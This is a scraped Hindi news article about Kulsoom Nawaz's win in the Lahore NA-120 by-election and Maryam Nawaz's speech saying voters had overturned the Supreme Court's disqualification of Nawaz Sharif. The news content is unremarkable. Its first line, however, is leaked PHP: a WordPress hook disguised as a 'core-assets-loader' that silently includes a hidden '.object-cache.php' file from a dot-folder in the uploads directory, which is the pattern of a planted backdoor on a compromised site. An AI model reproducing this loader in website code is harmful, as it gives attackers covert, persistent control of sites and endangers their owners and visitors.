add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); उपचुनाव में जीत के बाद बोलीं मरियम- जनता की कोर्ट में SC का फैसला खारिज, नवाज शरीफ आज भी PM – SOCH INDIA
Menu

देश
उपचुनाव में जीत के बाद बोलीं मरियम- जनता की कोर्ट में SC का फैसला खारिज, नवाज शरीफ आज भी PM

nobanner

पाकिस्तान के बर्खास्त प्रधानमंत्री नवाज शरीफ की बीमार पत्नी बेगम कुलसूम नवाज ने लाहौर उपचुनाव में शानदार जीत दर्ज की है. पाकिस्तानी मीडिया के मुताबिक कुलसुम को 59,413 वोट मिले, जबकि उनकी प्रतिद्वंदी यास्मीन राशिद को 46,145 वोट मिले. 28 जुलाई को पनामा लीक मामले में पाकिस्तान की सुप्रीम कोर्ट द्वारा नवाज शरीफ को इस पद के अयोग्य करार दिया था, जिसके बाद उनकी नेशनल एसेंबली की सदस्यता खत्म हो गई थी और उनको प्रधानमंत्री पद छोड़ना पड़ा था.

नवाज शरीफ के खिलाफ इस फैसले को न्यायिक तख्तापलट बताया जा रहा था. लाहौर की NA-120 सीट पर जीत के बाद नवाज शरीफ की बेटी मरियम नवाज ने समर्थकों को संबोधित करते हुए सुप्रीम कोर्ट समेत विपक्षी दलों पर जमकर निशाना साधा. उन्होंने कहा कि जनता की कोर्ट ने सुप्रीम कोर्ट के फैसले को खारिज कर दिया है. पाकिस्तान के सुप्रीम कोर्ट का फैसला कुछ भी हो, लेकिन नवाज शरीफ आज भी जनता के प्रधानमंत्री हैं और आगे भी रहेंगे. जनता ने उस फैसले पर फैसला दिया है, जिसके जरिए नवाज शरीफ को पद से हटा दिया गया था. चुनाव में पार्टी के कार्यकर्ताओं पर जुल्म ढहाए गए, लेकिन जीत हमारी ही हुई.